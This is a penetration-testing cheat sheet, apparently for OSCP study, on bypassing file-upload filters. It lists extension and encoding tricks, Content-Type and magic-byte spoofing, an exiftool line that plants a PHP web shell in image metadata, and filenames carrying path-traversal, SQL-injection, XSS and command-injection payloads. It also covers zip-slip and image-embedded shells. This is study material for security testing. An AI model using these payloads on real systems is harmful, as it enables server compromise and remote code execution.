File Uploads
Only refer Extensions section below for OSCP File upload Bypassing
Last updated
Was this helpful?
Only refer Extensions section below for OSCP File upload Bypassing
Last updated
Was this helpful?
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws
If they apply, then check the previous extensions. Also test them using some uppercase letters: PHP, .pHP5, .PhAr ...
Try adding a valid extension before the execution extension (use previous extensions also):
file.png.php
file.png.Php5
Try adding special characters at the end. You could use Burp to brute-force all the ASCII and Unicode characters. (Note that you can also try to use the previously motioned extensions)
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
Try to bypass the protections by tricking the extension parser on the server-side with techniques like doubling the extension or adding junk data (null bytes) between extensions. You can also use the previous extensions to prepare a better payload.
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
Add another layer of extensions to the previous check:
file.png.jpg.php
file.php%00.png%00.jpg
Try to put the exec extension before the valid extension and pray so the server is misconfigured. **(useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php** will execute code):
ex: file.php.png
Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “::$data” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”)
Bypass Content-Type checks by setting the value of the Content-Type header to image/png, text/plain, application/octet-stream
Bypass magic number check by adding at the beginning of the file the bytes of a real image (confuse the file command). Or introduce the shell inside the metadata: exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
It is also possible that the magic bytes are just being checked in the file and you could set them anywhere in the file.
Find a vulnerability to rename the file already uploaded (to change the extension).
Find a Local File Inclusion vulnerability to execute the backdoor.
Possible Information disclosure:
Upload several times (and at the same time) the same file with the same name
Upload a file with the name of a file or folder that already exists
Uploading a file with “.”, “..”, or “…” as its name. For instance, in Apache in Windows, if the application saves the uploaded files in the “/www/uploads/” directory, the “.” filename will create a file called “uploads” in the “/www/” directory.
Upload a file that may not be deleted easily such as “…:.jpg” in NTFS. (Windows)
Upload a file in Windows with invalid characters such as |<>*?” in its name. (Windows)
Upload a file in Windows using reserved (forbidden) names such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
Try also to upload an executable (.exe) or a .html (less suspicious) that will execute code when accidentally opened by the victim.
On some occasions, you may find that a server is using wget to download files and you can indicate the URL. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, this check can be bypassed.
The maximum length of a filename in Linux is 255, however, wget truncate the filenames to 236 characters. You can download a file called "A"*232+".php"+".gif", this filename will bypass the check (as in this example ".gif" is a valid extension) but wget will rename the file to "A"*232+".php".
Note that another option you may be thinking of to bypass this check is to make the HTTP server redirect to a different file, so the initial URL will bypass the check by then Wget will download the redirected file with the new name. This won't work unless the wget is being used with the parameter --trust-server-names because the wget will download the redirected page with the name of the file indicated in the original URL.
Set filename to ../../../tmp/lol.png and try to achieve a path traversal
Set filename to sleep(10)-- -.jpg and you may be able to achieve a SQL injection
Set filename to <svg onload=alert(document.comain)> to achieve an XSS
Set filename to ; sleep 10; to test some command injection
Here’s a top 10 list of things that you can achieve by uploading (from the link)
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
SVG: Stored XSS / SSRF / XXE
GIF: Stored XSS / SSRF
CSV: CSV injection
XML: XXE
AVI: LFI / SSRF
HTML / JS : HTML injection / XSS / Open redirect
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["
JPG: "\xff\xd8\xff"
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
The decompressed files will be created in unexpected folders.
One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately, this is not true. Since the ZIP archive format supports hierarchical compression and we can also reference higher-level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.
An automated exploit to create this kind of files can be found here: https://github.com/ptoomey3/evilarc
Some python code to create a malicious zip:
To achieve remote command execution I took the following steps:
Create a PHP shell:
Use “file spraying” and create a compressed zip file:
3.Use a hex-editor or vi and change the “xxA” to “../”, I used vi:
Done!
Only one step remained: Upload the ZIP file and let the application decompress it! If it succeeds and the web server has sufficient privileges to write the directories there will be a simple OS command execution shell on the system:
Reference: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/
Upload this content with an image extension to exploit the vulnerability (ImageMagick, 7.0.1-1)
The primary reason for putting a web shell in the IDAT chunk is that it has the ability to bypass resize and re-sampling operations - PHP-GD contains two functions to do this imagecopyresized and imagecopyresampled.
Read this post: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
Polyglots, in a security context, are files that are a valid form of multiple different file types. For example, a GIFAR is both a GIF and a RAR file. There are also files out there that can be both GIF and JS, both PPT and JS, etc.
Polyglot files are often used to bypass protection based on file types. Many applications that allow users to upload files only allow uploads of certain types, such as JPEG, GIF, DOC, so as to prevent users from uploading potentially dangerous files like JS files, PHP files or Phar files.
This helps to upload a file that complies with the format of several different formats. It can allow you to upload a PHAR file (PHP ARchive) that also looks like a JPEG, but probably you will still need a valid extension and if the upload function doesn't allow it this won't help you.
More information in: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
